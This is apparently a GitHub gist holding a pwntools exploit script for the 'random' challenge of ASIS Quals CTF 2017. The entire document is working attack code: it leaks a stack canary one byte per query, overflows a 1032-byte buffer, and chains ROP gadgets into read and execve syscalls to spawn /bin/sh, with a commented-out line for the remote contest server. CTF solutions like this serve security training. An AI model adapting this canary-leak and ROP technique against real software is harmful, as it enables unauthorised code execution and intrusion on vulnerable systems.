@kokjo
Created April 10, 2017 12:21
Exploit for the challenge random from ASIS Quals CTF 2017
from pwn import *
context.arch = "amd64"  # pwntools context: the challenge binary is x86-64
# Local copy of the challenge binary; the commented line below is the original
# CTF endpoint, kept only as a record of how the script was run at the event.
r = process("./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1")
#r = remote("69.90.132.40", 4000)
def _leak_byte(index):
    """Request value number *index* from the service and return it as an int."""
    r.sendline(str(index))
    r.recvuntil("Your value = ")
    return int(r.recvline())


# Byte 0 is fixed to zero (presumably the canary's terminating null byte);
# the remaining seven bytes are obtained one per query.
values = [0] + [_leak_byte(i) for i in range(1, 8)]
# word_size is in bits, so flat() emits one byte per element; the eight bytes
# are then read back as a single little-endian 64-bit value.
cookie = u64(flat(values, word_size=8))
log.info("Stack cookie = 0x%016x", cookie)
# Fixed addresses inside the challenge binary (the 0x400xxx range suggests a
# non-PIE build, so they are usable as-is). The names describe the
# instruction sequence each gadget is presumed to contain -- verify against
# the binary before reusing.
pop_rax_rdi = 0x400f8c  # presumably `pop rax; pop rdi; ...`
pop_rsi_r15 = 0x400f61  # presumably `pop rsi; pop r15; ...`
mov_rdx_rsi = 0x400f88  # presumably `mov rdx, rsi; ...`
syscall = 0x400f8f      # `syscall` instruction
bss = 0x602244          # writable scratch address: read() buffer and execve() path below
def syscall3(no, arg1, arg2, arg3):
    """Return the gadget/value list for one three-argument syscall.

    Assuming the gadget names describe their instruction sequences, the
    chain loads rax=no, rdi=arg1, rdx=arg3 (via rsi) and finally rsi=arg2,
    then executes ``syscall``. The result is a flat list of ints meant to be
    packed with flat().

    Args:
        no: syscall number placed in rax.
        arg1, arg2, arg3: values for rdi, rsi and rdx respectively.
    """
    junk = 0x4141414141414141  # filler for the r15 slot of pop_rsi_r15
    load_rax_rdi = [pop_rax_rdi, no, arg1]
    # rdx has no direct pop gadget: stage arg3 through rsi, then copy it over.
    load_rdx = [pop_rsi_r15, arg3, junk, mov_rdx_rsi]
    load_rsi = [pop_rsi_r15, arg2, junk]
    return load_rax_rdi + load_rdx + load_rsi + [syscall]
r.sendline("0")

# Two syscalls back to back (amd64 numbers: 0 = read, 0x3b = execve):
#   read(0, bss, 8)   -- pulls the 8-byte path string sent below into memory
#   execve(bss, 0, 0) -- runs it
stage_read = syscall3(0, 0, bss, 8)
stage_exec = syscall3(0x3b, bss, 0, 0)
rop = flat([stage_read, stage_exec])
# The chain goes out via sendline(), so an embedded newline would cut it short.
assert "\n" not in rop

#gdb.attach(r)
payload = "A" * 1032      # filler up to the saved canary
payload += p64(cookie)    # leaked canary value so the stack check passes
payload += "B" * 8        # 8 bytes between canary and return address (presumably saved rbp)
payload += rop
r.sendline(payload)
# Give the read() stage a moment to be reached before its 8 bytes arrive.
sleep(0.1)
r.send("/bin/sh\x00")     # exactly 8 bytes, matching the read() length above
# Sync on a known marker so interactive() starts with a clean stream.
r.sendline("echo SHELL")
r.recvuntil("SHELL\n")
r.interactive()